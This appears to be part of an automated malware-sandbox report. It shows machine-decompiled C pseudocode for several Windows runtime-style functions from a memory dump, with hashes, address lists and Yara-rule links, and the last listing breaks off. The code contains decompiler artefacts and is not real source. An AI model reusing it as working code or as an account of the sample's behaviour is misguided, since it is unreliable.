0x029d6dec
0x029d6def
0x029d6df2
0x029d6df5
0x029d6dfe
0x029d6e04
0x029d6e09
0x029d6e0d
0x029d6e18
0x029d6e1b
0x029d6e22
0x029d6e2d
0x029d6e30
0x029d6e36
0x029d6e42
0x029d6e4d
0x029d6e50
0x029d6e55
0x029d6e5c
0x029d6e6e
0x029d6e5e
0x029d6e67
0x029d6e67
0x029d6e73
0x029d6e74
0x029d6e77
0x029d6e7c
0x029d6e7d
0x029d6e8e
0x029d6e93
0x029d6e9c
0x029d6ea8
0x029d6eab
0x029d6eac
0x029d6eb3
0x029d6ecd
0x029d6edc
0x029d6ee2
0x029d6ee5
0x029d6ef2
0x029d6efb
0x029d6f01
0x029d6f06
0x029d6f0b
0x029d6f11
0x029d6f1a
0x029d6f22
0x029d6f26
0x029d6f26
0x029d6f33
0x029d6f41
0x029d6f44
0x029d6f47
0x029d6f54
0x029d6f65
0x029d6f77
0x029d6f7c
0x029d6f82
0x029d6f91
0x029d6f99
0x029d6fa3
0x029d6fae
0x029d6fae
0x029d6fba
0x029d6fbb
0x029d6fbc
0x029d6fc1
0x029d6fc2
0x029d6fd3
0x029d6fd8
0x029d6fd8
0x029d6fdf
0x029d6fe8
0x029d6fee
0x029d6fee
0x029d6ff5
0x029d6ffb
0x029d6ffb
0x029d7004
0x00000000
0x029d700a
0x029d7004
0x029d6eb3
0x029d6e9c
0x029d7015

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: f10323ee938b8fafcb0b876a6534398f02e12ae9a70dd648cdb5e6072eabc6f8
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 7A715D71E00619EFCB10DFA9C984AEEFBB9FF88714F104469E505A7290DB34AA41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 029552A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E029552A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0296EEF0(0x2a479a0);
					_t104 =  *0x2a48210; // 0xaa2cb8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0296EB70(_t93, 0x2a479a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E02999890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0296EEF0(0x2a479a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0296EB70(0, 0x2a479a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xaa2cc5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0298F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0296EEF0(0x2a479a0);
									__eflags =  *0x2a48210 - _t104; // 0xaa2cb8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x2a48210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E029D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0296EB70(_t95, 0x2a479a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E029995D0();
											L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E029995D0();
											L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0296EB70(_t93, 0x2a479a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E029995D0();
										L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E029995D0();
										L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0298F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x029552a5
0x029552ad
0x029552b0
0x029552b3
0x029552b7
0x029552ba
0x029552bf
0x029552c4
0x029552cc
0x00000000
0x00000000
0x029552ce
0x029552d9
0x029552dd
0x029552e7
0x029552f7
0x029552f9
0x029552fd
0x029b0dcf
0x029b0dd5
0x029b0dd6
0x029b0dd7
0x029b0dd8
0x029b0dd9
0x029b0dde
0x029b0ddf
0x029b0de0
0x029b0de1
0x029b0de2
0x029b0de5
0x029b0dea
0x029b0dec
0x029b0f60
0x029b0f64
0x029b0f70
0x029b0f76
0x029b0f79
0x029b0f79
0x00000000
0x029b0f64
0x029b0df2
0x029b0df7
0x029b0e04
0x029b0e0d
0x029b0e0d
0x029b0e10
0x029b0e1a
0x029b0e1c
0x029b0e4c
0x029b0e52
0x029b0e61
0x029b0e67
0x029b0e6b
0x029b0e70
0x029b0e76
0x029b0ed7
0x029b0edc
0x029b0ee0
0x029b0ee6
0x029b0eea
0x029b0eed
0x029b0ef0
0x029b0ef3
0x029b0ef6
0x029b0ef9
0x029b0efe
0x029b0f01
0x029b0f01
0x029b0f0b
0x029b0f12
0x029b0f16
0x029b0f18
0x029b0f1b
0x029b0f2c
0x029b0f31
0x029b0f31
0x029b0f35
0x029b0f39
0x029b0f3a
0x029b0f3c
0x029b0f3f
0x029b0f50
0x029b0f55
0x029b0f55
0x029b0f59
0x029552eb
0x029552f1
0x029552f1
0x029b0e7d
0x029b0e84
0x029b0e88
0x029b0e8a
0x029b0e8d
0x029b0e9e
0x029b0ea3
0x029b0ea3
0x029b0ea7
0x029b0eaf
0x029b0eb3
0x029b0eb9
0x029b0eb9
0x029b0ebc
0x029b0ecd
0x029b0ecd
0x00000000
0x029b0eb3
0x029b0e21
0x029b0e2b
0x029b0e2f
0x029b0e30
0x029b0e3a
0x029b0e3f
0x029b0e41
0x00000000
0x00000000
0x029b0e47
0x00000000
0x029b0e47
0x029b0df9
0x029b0dfe
0x00000000
0x00000000
0x00000000
0x029b0dfe
0x02955303
0x02955307
0x00000000
0x02955309
0x00000000
0x02955309
0x02955307
0x029552e9
0x029552e9
0x00000000
0x029552e9
0x0295530e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d34ea7e598a94128bbe49356a75f5e17d2eacc33f9459faf11a20b0f87db76
Instruction ID: 8352538c79e4d9586c3822623479b594428bad4ab935e71f380f511f7c713833
Opcode Fuzzy Hash: 43d34ea7e598a94128bbe49356a75f5e17d2eacc33f9459faf11a20b0f87db76
Instruction Fuzzy Hash: 3A51DE71205382AFD721EF68C944B67BBE9FF84710F144D1EE89587652EB74E804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02982AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02982AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x2a48204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x2a48208; // 0x2a48207
				_t8 = _t57 + 0x2a48208; // 0x2a48207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x2a48450; // 0xaa172a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x2a4821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x2a46d5c; // 0x7f070654
							_t72 =  *0x2a46d5c; // 0x7f070654
							_t75 =  *0x2a46d5c; // 0x7f070654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x2a46d5c; // 0x7f070654
							_t84 =  *0x2a46d5c; // 0x7f070654
							_t87 =  *0x2a46d5c; // 0x7f070654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0299F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x02982ae4
0x02982aec
0x02982aef
0x02982af4
0x02982af7
0x02982afd
0x02982b92
0x02982b92
0x02982b97
0x02982b9c
0x02982b9c
0x02982b03
0x02982b06
0x02982b09
0x02982b09
0x02982b0f
0x02982b15
0x02982b15
0x02982b1b
0x02982b1e
0x02982b21
0x02982b26
0x02982b29
0x02982b81
0x02982b84
0x02982c0e
0x02982c15
0x02982c24
0x02982c24
0x02982b8a
0x02982b8a
0x02982b8a
0x02982b8a
0x02982b90
0x00000000
0x00000000
0x00000000
0x00000000
0x02982b4a
0x02982b4a
0x02982b4d
0x02982b53
0x00000000
0x00000000
0x02982b55
0x02982b58
0x02982bb7
0x029c5d1b
0x029c5d37
0x029c5d47
0x029c5d53
0x02982bbd
0x02982bbd
0x02982bbd
0x02982bb7
0x02982b5d
0x02982c2f
0x029c5d5b
0x029c5d77
0x029c5d87
0x029c5d93
0x02982c35
0x02982c35
0x02982c35
0x02982c2f
0x02982b65
0x02982b9f
0x02982ba2
0x02982b67
0x02982b67
0x02982b69
0x02982b6b
0x02982b6e
0x02982bc9
0x02982bcc
0x02982bcf
0x02982bd4
0x02982bd6
0x02982bd6
0x02982bdb
0x02982c02
0x02982c05
0x02982c07
0x00000000
0x02982c07
0x02982be0
0x02982c00
0x02982c3f
0x02982c3f
0x00000000
0x02982c00
0x02982be5
0x02982be7
0x02982bec
0x02982bf4
0x02982bf6
0x00000000
0x02982bf6
0x02982b70
0x02982b76
0x02982b2b
0x02982b2b
0x02982b2d
0x02982b2f
0x02982b32
0x02982b35
0x02982b3a
0x00000000
0x02982b40
0x02982b43
0x02982b45
0x02982b47
0x02982b4a
0x02982b4d
0x02982b53
0x00000000
0x00000000
0x00000000
0x02982b53
0x02982b78
0x02982b78
0x02982b7b
0x02982b7e
0x00000000
0x02982b7e
0x02982b76
0x02982ba5
0x02982ba5
0x02982ba8
0x02982bad
0x00000000
0x00000000
0x02982baf
0x02982baf
0x02982bc2
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8427b6cf9d36c7291d37291a73090ab7ae6d6283bf10aedba320d8ab95cb1f
Instruction ID: 1921388dcbb63c6c8d2a1b3eff12c31d313c1d51f032d5f9a310f92254509bc4
Opcode Fuzzy Hash: ea8427b6cf9d36c7291d37291a73090ab7ae6d6283bf10aedba320d8ab95cb1f
Instruction Fuzzy Hash: 8C518D76E011558FCB14EF29C8809BDB7F5FB8970071A885EEC56AB314EB34EA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A1AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E02A1AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E02A1C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E02A1ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E02A1FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E02A1EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E02977D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E02A11608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E02A21536(0x2a48ae4, (_t74 -  *0x2a48b04 >> 0x14) + (_t74 -  *0x2a48b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L02A1C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E02A1A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E029FCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E02A1ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x02a1ae44
0x02a1ae4c
0x02a1ae53
0x02a1ae55
0x02a1ae5c
0x02a1ae64
0x02a1ae68
0x02a1ae75
0x02a1ae75
0x02a1ae78
0x02a1ae7a
0x02a1ae7c
0x02a1ae7f
0x02a1aea8
0x02a1aeab
0x02a1aead
0x00000000
0x00000000
0x02a1aeb3
0x02a1aeb8
0x02a1aebb
0x02a1aebd
0x00000000
0x02a1ae81
0x02a1ae88
0x02a1ae8f
0x02a1ae9b
0x02a1ae96
0x02a1ae96
0x02a1ae96
0x02a1aea0
0x02a1aea3
0x02a1aebf
0x02a1aebf
0x02a1aec3
0x02a1aec9
0x02a1af0d
0x02a1af14
0x02a1af3d
0x02a1af3d
0x02a1af41
0x02a1af44
0x02a1af67
0x02a1af67
0x02a1af6a
0x02a1afca
0x02a1afd1
0x00000000
0x02a1afd1
0x02a1af6c
0x02a1af6d
0x02a1af75
0x02a1af7c
0x02a1af7e
0x02a1af80
0x02a1af85
0x02a1af87
0x02a1af99
0x02a1af89
0x02a1af92
0x02a1af92
0x02a1af9e
0x02a1afa1
0x02a1afa3
0x02a1afa9
0x02a1afb0
0x02a1afb2
0x02a1afb4
0x02a1afbc
0x02a1afbc
0x02a1afb4
0x02a1afb0
0x00000000
0x02a1afa1
0x02a1af4f
0x02a1af57
0x02a1af5c
0x02a1af5e
0x00000000
0x00000000
0x02a1af60
0x02a1af64
0x02a1af64
0x00000000
0x02a1af64
0x02a1af1a
0x02a1af25
0x00000000
0x00000000
0x02a1af27
0x02a1af28
0x02a1af33
0x00000000
0x02a1aed0
0x02a1aed0
0x02a1aed2
0x02a1aee1
0x02a1aee4
0x00000000
0x00000000
0x02a1aee6
0x02a1aeec
0x00000000
0x00000000
0x02a1aefb
0x02a1af07
0x02a1afd3
0x02a1afdb
0x02a1afdb
0x00000000
0x02a1af07
0x02a1aed6
0x02a1aed8
0x02a1aedf
0x00000000
0x00000000
0x00000000
0x02a1aedf
0x02a1aec9

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2711bfe1ac22997686470baadcb9870846d7f4fdb3177213b8027343985fbc38
Instruction ID: dd404f44ad729f20dcfe091c04fc511677b2a18e342f2413ab8be536cf8c38bf
Opcode Fuzzy Hash: 2711bfe1ac22997686470baadcb9870846d7f4fdb3177213b8027343985fbc38
Instruction Fuzzy Hash: BF41C4B27022119BC726DB29C9D4B7BB39AEF84734F04821AF856872D2DF34D801CA91

Uniqueness

Uniqueness Score: -1.00%

Function 0297DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0297DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0295CC50(E02954510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E02977D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E02A28ED6(_t102, _t98);
						}
						_t76 = _v44;
						E02972280(_t58, _v44);
						E0297DD82(_v44, _t102, _t98);
						E0297B944(_t102, _v5);
						return E0296FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x2a48628; // 0x0
							_v28 = _t67;
							_t68 =  *0x2a4862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x2a48628; // 0x0
						_t105 = _v28;
						_t80 =  *0x2a4862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x2a1fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0297dbe9
0x0297dbf2
0x0297dbf7
0x0297dbf9
0x0297dbfc
0x0297dc00
0x0297dc03
0x0297dc14
0x0297dd54
0x0297dd54
0x0297dd54
0x0297dc18
0x0297dc1d
0x0297dc1d
0x0297dc32
0x0297dc3b
0x0297dc3e
0x0297dc46
0x0297dd5b
0x0297dd62
0x0297dd64
0x0297dd67
0x0297dd69
0x0297dd6b
0x0297dd6e
0x0297dd70
0x0297dd73
0x0297dd73
0x00000000
0x0297dc4c
0x0297dc4e
0x029c3ae3
0x029c3ae8
0x029c3aea
0x0297dce7
0x0297dce9
0x0297dcec
0x0297dcee
0x0297dcf0
0x0297dcf3
0x0297dcf5
0x029c3af2
0x029c3af5
0x029c3af5
0x0297dd06
0x0297dd08
0x0297dd0b
0x0297dd12
0x029c3b08
0x0297dd18
0x0297dd18
0x0297dd18
0x0297dd20
0x0297dd23
0x029c3b16
0x029c3b16
0x0297dd29
0x0297dd2d
0x0297dd36
0x0297dd40
0x0297dd51
0x0297dd51
0x0297dc54
0x0297dc59
0x0297dc59
0x0297dc5e
0x0297dc5e
0x0297dc63
0x0297dc66
0x0297dc6b
0x0297dc78
0x0297dc7b
0x0297dc81
0x0297dc81
0x0297dc83
0x0297dc89
0x00000000
0x00000000
0x0297dd7b
